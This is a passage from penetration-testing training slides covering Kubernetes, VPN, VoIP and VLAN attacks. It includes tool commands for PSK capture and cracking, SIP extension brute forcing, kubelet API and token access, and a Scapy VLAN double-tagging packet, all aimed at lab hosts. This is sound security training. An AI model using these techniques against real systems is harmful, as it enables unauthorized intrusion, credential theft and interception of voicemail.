• Nessus: https://www.tenable.com/blog/auditing-docker-with-nessus-66

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Vulnerable Docker VM
• We have created a vulnerable docker VM that suffers from many of the
vulnerabilities discussed throughout this session.

• This is available to download from the following URL:

https://www.notsosecure.com/vulnerable-docker-vm/

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Kubernetes
Open-Source System
for
automating deployment,
scaling, and management
of
containerized applications

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Kubernetes: Basics
• Pod - A group of containers, runs in a shared context
• Labels - Labels for identifying pods
• Kubelet - Container agent
• Proxy - A load balancer for pods
• etcd - Metadata service (key-value store)
• Replication Controller – Manage replication of pods

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Kubernetes: Security Overview
• Doesn’t have any security by default for versions 1.5 and below
• Kubernetes came up with RBAC & ABAC models version >=1.5
• By default, if not mentioned, all things run as root in container
• Access to etcd is open by default
• Lots of security misconfigurations

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Kubernetes: Ports
Port/Protocol Description
• 6443 TCP Kubernetes API server (master only)
• 2379 - 2380 TCP etcd server client API (master only)
• 10250 TCP Kubelet API
• 10251 TCP kube-scheduler (master only)
• 10252 kube-controller-manager (master only)
• 10255 Read-Only Kubelet API
• 30000 - 32767 NodePort services (client only)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Kubernetes: Enumeration
• List kubernetes details
kubectl cluster-info
• List all the resources
kubectl get all || (Pods, namespaces, services)
• Prints all information about the individual pod|service|deployment
kubectl describe pod|service|deployment <name>
• Runs an nginx as deployment
kubectl run nginx --image=nginx
• Creates a kubernetes resource based on the file configuration
kubectl create –f ./input_file.yaml

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Kubernetes: Attack Surface
• Identify current user in pod. root == system compromised chances
• Identify the various services exposed on the network / localhost
– 10250 : API (kubelet exploit)
– API Read/write access == full pwnage
• Identify list of running pods using API
curl –sk https://192.168.99.101:10250/runningpods/ | python
–mjson.tool
• Identify if token is accessible
/var/run/secrets/kuberenetes.io/serviceaccount/token
• Token / API gives direct access to interact with Base Machine

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Kubernetes: Tricks
• To create your own kube node
kubectl create -f test.yml
• Execute code or run shell from a specific container
kubectl exec <pod_name> -c <container_name> -i -t -- <shell>
• Copies from to and from nodes
kubectl cp <some-namespace>/<some-pod>:/tmp/foo /tmp/bar

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Network Status: After a Barrage of Linux Sploits!

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Module 8
VPN Hacking

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VPN: Virtual Private Network

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VPN: Types
● PPTP
○ Easy to configure, fast and the weakest in regards to security
○ MSCHAPv1 is broken since 15+ years ago
○ Unencapsulated MS-CHAPv2 authentication
○ What else? MS says use L2TP with IPSec or SSTP
● L2TP/IPSec
○ L2TP can be run over non-IP networks (frame relay, ATM,etc)
○ L2TP encapsulates the data and...
○ ...the IPSEC connection is used to transport this data
● ‘Others’
○ Secure Socket Tunnelling Protocol (SSTP), OpenVPN

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VPN: Services
General Ports/Protocols:
○ PPTP - 1723/TCP
○ L2TP - 1701/UDP

○ IPSec
■ 500/UDP (IKE)/ 500/TCP (IKE over TCP sometimes)
■ IP protocol 50 (Encapsulating Security Payload - ESP) and 51
(Authentication Header - AH)
■ 4500/UDP (Nat Traversal)

○ SSTP/OpenVPN/SSL VPNs
■ 443/TCP

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VPN: IPSec Hierarchy

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VPN: IKE Connection Mode

● IKE Phase 1 occurs in two modes:

○ Main Mode (6 packet exchange)
○ Aggressive Mode (3 packet exchange)

● Authentication and key exchange is a two phase process:

○ Phase 1 - authenticates and establishes a secure channel known as IKE SA
○ Phase 2 - negotiates IPSec mode, sets up secure channel of AH/ESP traffic
known as IPSec SA

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VPN: Main Mode vs Aggressive Mode

Image source: http://rayas-security.blogspot.co.uk

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VPN: Attribute Selection
• The first mutually acceptable attribute is selected for use

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

 VPN: IKE-Scan
● A SA payload contains a single proposal, containing eight transforms.
Enc (2) * Hash (2) * Auth (1) * Group (2) * Lifetime (1) =2x2x1x2x1=8
transforms (basically combinations)
● Transform attributes - The 8 transforms represent the following attribute
combinations (IKE default proposal):
● Enc: DES or Triple DES
● Hash: MD5 or SHA1
● Auth: Pre-Shared Key
● Group: 1(modp768) or 2 (modp1024)
● SA Lifetime: 28800 seconds

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

 VPN: IKE-Scan
● Enumeration - Fingerprinting, Vendor information (VID), id/group names etc.

● Be aware - the PSK may not be enough on it’s own!

● Authentication mechanisms (relevant to this example):

○ PSK
○ XAUTH - provides an additional level of authentication by requesting extended
authentication from users, thus forcing remote users to respond with their
credentials before being allowed access to the VPN (http://www.ciscopress.com)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

 VPN: IKE-Scan
● Useful switches:
--sport=<p> can be used to set UDP source port to <p>,default=500

--trans=<t> use custom transform <t> instead of the default set

--id=<id> is the identification value.This option is only applicable to

Aggressive Mode

--auth=<n> set the auth method to <n>, default=1 (PSK), XAUTH uses 65001 to
65010

-P<location> This option outputs the aggressive mode PSK parameters for offline
cracking

A very handy reference: http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
VPN: Attack Methodology
• Identify a VPN server
– nmap and udp-proto-scanner
• Identify valid proposals / Identify handshake mode (main/aggressive)
– ike-scan

• Identify authentication (PSK/XAUTH etc.) and ID (dependant on server config)

• Capture and crack psk if aggressive mode is identified
– psk-crack
• Using the identified PSK, id and ‘other’ credentials login to the VPN
– Strongswan, Openswan or another VPN client
• Attack the internal network!

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VPN: Preparation
● Ensure we have a VPN client to hand (Strongswan)
● Configuration Sample ~/Tools/VPN_Config/
● Copy the sample config files to /etc/ipsec.conf and /etc/ipsec.secrets on your
attacking host
● Crack the PSK
psk-crack -d <dictionary> capture_file

● Amend the file /etc/ipsec.secrets to reflect your findings!

● Connect to the VPN (ipsec up vpn)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VPN: What We Need to Know...
● We need to know the following:
PSK
ID/group name
Authentication type
● However we can’t make a connection as we still need XAUTH credentials!
● Within ~/Tools/VPN_Config/ you’ll find:
brute-xauth.sh
ipsec_conf_sample
ipsec_secrets_sample
● Play ;-)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 8.1
• Identify a VPN service running on 192.168.3.211
• Identify a misconfiguration with the host
• Obtain the ID/group name
• Crack the PSK

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

LAB Time Challenges (continuing 8.1)
• Use ~/Tools/VPN_Config/brute-xauth.sh to identify weak XAUTH
credentials
• Connect to the internal network

Bonus:
• On the VPN host, obtain access to the julie account
• On the VPN host, obtain access to the root account

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Network Status: After VPN Exploitation

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Module 9
VoIP Hacking

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VoIP: Voice over IP
● Voice over IP
● IP network only if both ends are on IP Network
● IP to PSTN translation in case one end is PSTN
● Consists of:
○ Phone calls over IP
○ Voice Messages/Storage
○ Telephonic connectivity over IP network (internal/external)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VoIP: SIP Protocol (RFC 3261)
• Establish, manage and terminate VOIP sessions

https://www.ietf.org/rfc/rfc3261.txt
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
VoIP: SIP Request Methods

● Common SIP Request Methods (many more not included here):

INVITE Indicates a client is being invited to participate in a call session

ACK Confirms that the client has received a final response to an INVITE request

BYE Terminates a call and can be sent by either the caller or the callee

CANCEL Cancels any pending request

OPTIONS Queries the capabilities of servers

REGISTER Registers the address listed in the To header field with a SIP server

*source https://en.wikipedia.org/wiki/List_of_SIP_request_methods)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VoIP: SIP Response Codes

● Common SIP response codes:

1xx Provisional
2xx Successful
3xx Redirection
4xx Client Failure
5xx Server Failure
6xx Global Failure

*source https://en.wikipedia.org/wiki/List_of_SIP_request_methods)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VoIP: Attack Surface
• Traffic might be sent over the Internet (or other untrusted network)
and could be intercepted
• Passwords are generally numeric in nature
• Most network firewalls are not VoIP aware (either allow or block, or
rate limit if nothing else)
• Underlying remote admin protocols are too trustworthy
• Unpatched Systems (why bother, they are internal?)
• Take it down (not in this lab at least!)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VoIP: Attack Methodology
• Identify VoIP endpoints, enumerate info such as extensions and SIP
Methods that are allowed
• Bruteforce logins (Asterisk call manager)
• Extract VoIP user passwords
• Listen/retrieve voice messages
• Exploit web admin interfaces
• March towards root!

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VoIP: Enumeration
● UDP Port Scan
Common Ports:
• SIP TCP/UDP 5060
• SIP over TLS TCP/UDP* 5061
*Note that TLS (the successor to SSL) can only be ● TCP Port Scan
established over a TCP connection

Not So Common Ports**:

• Asterisk Call Manager TCP 5038

**Generally Call Manager functionality is only accessible

via the localhost interface on an Asterisk PBX

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VoIP: Enumeration

● svmap.py (part of sipvicious) can be used to identify more

details about the VoIP server

svmap <IP>

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VoIP: Extensions and Methods

● svwar (part of sipvicious) can bruteforce various extensions

svwar –m <METHOD> –D <IP>

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VoIP: Extensions and Methods

● Use extensions identified via svwar to brute-force

extension passwords

svcrack –u<ID> -d
/usr/share/wordlists/dirb/others/best1050.txt <IP>

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

SIP Call Manager Login

● Login to VoIP call manager via telnet interface

(default/weak creds)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

SIP Call Manager Commands

● Obtain a list of the available commands via the call

manager interface (useful resource http://www.voip-info.org/wiki/view/Asterisk+CLI)
action: ListCommands

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VoIP: Impersonate VoIP Users

● Once we have the user extension and their secret, we can

impersonate the target and listen to their voicemails

● Use a SIP client that is specific to your OS:

○ Windows and Mac: X-Lite
○ Linux: Ekiga or Linphone
○ Cross platform: Zopier

X-Lite : http://www.counterpath.com/x-lite-download/

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VoIP: X-Lite and Linphone Client Configs

● X-Lite ● Linphone

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 9.1
• What services are running on 192.168.3.210?
• Identify the port on which a SIP Service is running and also identify the UserAgent
(i.e. PBX details)
• Identify and attempt to crack passwords for some extensions available on SIP Server
• Identify the username and the password for Call manager interface
• Using the above; identify the password for SIP user 200 (not 2000)
• Identify a user with voicemail access
• Connect and retrieve voicemail message
• Based on voicemail identify login credentials for user account and gain admin access
to the freepbx web application

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

LAB Time Challenges (9.2)
• Gain root access on the VoIP server

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Network Status: After VoIP Exploitation

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Module 10
VLAN Hacking

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

The Basics
● Cisco’s definition of Virtual Local Area Network (VLAN)
“A VLAN is a group of devices on one or more LANs that are configured to
communicate as if they were attached to the same wire, when in fact they are
located on a number of different LAN segments. Because VLANs are based on
logical instead of physical connections, they are extremely flexible”

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Understanding VLAN
● Why are these used?
○ Primarily for isolation
○ Security
○ Flexibility
○ Traffic load balance/decreases latency

● Massive scope as single error can lead to isolation breakage

● Learn VLAN basics to understand VLAN Better:

○ Trunking
○ 8021q tagging
○ Virtual interfaces
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
VLAN: Trunking

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VLAN: 802.1Q Tagging
● 802.1Q tagging (IEEE standard)
○ 4 byte tag (2 bytes TPID + 2 bytes TCI)
○ Inserted in the frame
● ISL encapsulation
(Inter switch link by Cisco)

● SVI (Switch Virtual Interface)

○ Allows traffic routing
b/w VLANs by a def gw
○ Supports bridging
config and routing protocol

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VLAN: Protocols in Use
● CDP - Cisco Discovery Protocol
○ Used by Cisco devices to communicate with neighbours
○ CDP announcements broadcast over VLAN 1 are interesting!

● STP - Spanning Tree Protocol

○ Builds network topology with focus on loop avoidance

● DTP - Dynamic Trunking Protocol

○ When you want to dynamically configure trunks on each switch port
○ Switch port modes: Access, Trunk, Dynamic Auto, Dynamic Desirable

● VTP - VLAN Trunking Protocol

○ Used to Transmit VLAN Information and help with autoconfiguration
○ Broadcast on VLAN 1
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
VLAN: Concepts
● DTP negotiated interface modes dynamically based on port modes
● Generally used for Ports connecting two switches
● Dynamic Auto is the default in newer Cisco IOS; whereas Dynamic
Desirable is default in older revisions

Dynamic Desirable + Dynamic Auto = Trunk Dynamic Auto + Dynamic Auto = Access
Dynamic Desirable + Dynamic Desirable = Trunk Dynamic Auto + Dynamic Desirable = Trunk
Dynamic Desirable + Trunk = Trunk Dynamic Auto + Trunk = Trunk
Dynamic Desirable + Access = Access Dynamic Auto + Access = Access

● Unauthenticated Protocol: Anyone can send false DTP Packets

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
VLAN: Hopping
● Attacking a network with multiple VLANs
● It is directed at trunking encapsulation protocols (8021q/ISL)
Two attacks:
○ Switch spoofing: Mimic a switch (inject DTP packets, negotiate
with switch to act as 802.1Q trunk)

○ Double tagging: Forwards the packet to a wrong VLAN, strips first

header and forwards to the target VLAN, as defined within the
second header

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Double Tagging : Example
● Two VLAN’s: 1 and 20
● VLAN 1 is native vlan
● All computer ports are access ports
● Attack video
https://youtu.be/bbuYKughzS8

● Scapy One liner

sendp(Ether(dst='ff:ff:ff:ff:ff:ff',
src='c2:db:bd:5d:bf:02')/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='10.0.20.11', src='10.0.1.11')/ICMP())
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Switch Spoofing
● Attack by mimicking a Switch
● Leverage issues with DTP configuration to gain trunk port
switchport mode trunk dynamic desirable dynamic auto access

trunk Yes Yes Yes No

dynamic desirable Yes Yes Yes No

dynamic auto Yes Yes No No

access No No No No

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VLAN Hopping: Attack
● Collect information:
○ VLAN IDs
○ IP addresses (gateways, hosts, anything!)
○ Keep sniffing!

● Toolset:
○ Yersinia (Kali has it!)
○ Sniffers
○ arp-scan

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VLAN: Attacks
● After negotiating a trunk link you can identify VLAN ID’s and add VLAN
interfaces on your host to target these ranges

● Once successful, an easy approach is to perform ‘ARP’ sweeps/ping broadcast

addresses to find live hosts on the target VLAN

● If there are any hosts, go for pwnage!

● If there are any devices, go for known service (Telnet, HTTP) weaknesses first,
and further exploration!

● It’s effectively an open door to the whole of the network!

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VLAN: Challenges
● A number of challenges relate to topics we have covered during
these slides

● A few challenges relate to device configuration weaknesses i.e.

switch/router configurations

● This will cover:

○ Weak passwords (Cisco type7 and ‘secret’ passwords)
○ Cracking device passwords

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Uncommon Sense
● In order to analyse traffic, we need to ensure our interface is up and running
and all the necessary modules are loaded
#ip link

● If you see lower_up flag, that means network is connected. Output example:
root@kali:~# ip link
1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN mode DEFAULT link/loopback
00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UNKNOWN mode
DEFAULT qlen 1000 link/ether 00:50:56:9f:29:9e brd ff:ff:ff:ff:ff:ff

● To load the 8021q module, run this command:

# modprobe 8021q

● Multiple ways to perform sniffing, use whichever method gives you the most
info

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 10.1
● Identify the protocols being broadcast by the switch/routing device on the network
● Observe the traffic, and then answer the following questions:
○ Device name
○ Platform details
○ Software version
● Find the management domain name and IP address from the device traffic
● Discover all of the VLAN IDs on the network
● Find all of the live hosts in the VLANs lower than ID 100 (PS. The 3rd octet in the IP address
relates to VLAN ID. For example, 10.10.100.210 means it’s a host in the VLAN 100. This is a common
naming notation for tagged traffic in the real world)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Useful Tips
For the upcoming exercise, you will need to understand the following:
○ For every VLAN, VLANID represents the network octet. For example, for VLAN
100, you will use VLAN 100 network range as 10.10.100.0/24.
○ When you assign a static IP to the interface on your Kali host, please assign a
static IP corresponding to your user ID. For example, if I am user20, I will use
10.10.100.20 as my static IP address.

In effect, once I have added virtual interface for VLAN 100, my static IP will
be 10.10.100.20 which means 100 is the VLANID and 20 is my user ID

Any doubts; please reach out for assistance

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 10.2
You will have already identified an IP address of a device on VLAN ID 100. Continuing
with this attack, perform the following tasks:
• Find the IP address of another device on VLAN 100 (hint - ARP!)
• Gain Telnet access to the second device (If you are connecting to the right device,
you will be able to ping the IP and read it’s custom telnet banner. Another hint is
it’s IP address is greater than 10.10.100.200)
• Gain ‘enable’ access to the device. You’ll need to gain access to the Telnet interface
(a common/default password value) and then learn to crack Cisco ‘secret’/type 5
and type 7 passwords

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VLAN: The Network

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

VLAN: Attack Mitigation
● Example: access mode
#switchport mode access
#switchport nonegotiate
#switchport access vlan 100

● Example: trunk mode

#switchport trunk encapsulation dot1q
#switchport mode trunk
#switchport nonegotiate
#switchport trunk allowed vlan 10,100
#switchport trunk native vlan 1

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Network Status: After VLAN Exploitation

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Online Lab: You Haven’t Finished Yet...

● Additional Challenges:
○ Using different tools/techniques to target IPv6 enabled hosts
○ Multiple ways to ‘land’ a shell and gain root access on the VoIP box
○ + Anything we may not have covered/had time for during this training!
○ MySQL and PostgreSQL on 192.168.3.100

● Root Access pending on:

○ 192.168.3.100 (Oracle)
○ 192.168.3.180 (Heartbleed + ShellShock)
○ 192.168.3.208 (Jenkins)
○ 192.168.3.210 (VPN)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

 feedback/contact
aih2training@notsosecure.com

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

About NotSoSecure
Specialist IT Security Company providing cutting-edge IT security consultancy and training

Pentest Services Training

● Application Pentest ● Advanced Infrastructure Hacking

● Infrastructure Pentest ● Web Hacking - Black Belt Edition
● Mobile Apps Pentest ● Basic Web Hacking
● Source Code Review ● Basic Infrastructure Hacking
● Red Team Assessment ● Appsec for Developers
● IoT Review ● IoT Hacking

For private/corporate training please contact us at training@notsosecure.com

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.